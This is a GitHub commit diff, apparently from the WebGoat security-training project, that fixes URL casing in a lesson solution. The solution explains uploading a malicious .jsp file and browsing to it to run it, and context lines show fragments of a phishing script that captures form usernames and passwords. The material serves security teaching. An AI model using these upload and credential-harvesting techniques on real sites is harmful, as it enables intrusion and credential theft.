You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
<fontsize="2"><b>File path for the uploaded image (and our .jsp) in Firefox.</b></font><br/><br/>
39
-
The URL should look something like <b>http://localhost/webgoat/uploads/image.jpg</b>.<br/>
40
-
The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like <b>http://localhost/webgoat/uploads/yourfile.jsp</b>.<br/><br/>
39
+
The URL should look something like <b>http://localhost/WebGoat/uploads/image.jpg</b>.<br/>
40
+
The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like <b>http://localhost/WebGoat/uploads/yourfile.jsp</b>.<br/><br/>
41
41
A blank page will load. You can then return to the lesson and refresh, completing the lesson.<br/><br/><br/>
document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
43
43
User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen.
58
58
User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);}
0 commit comments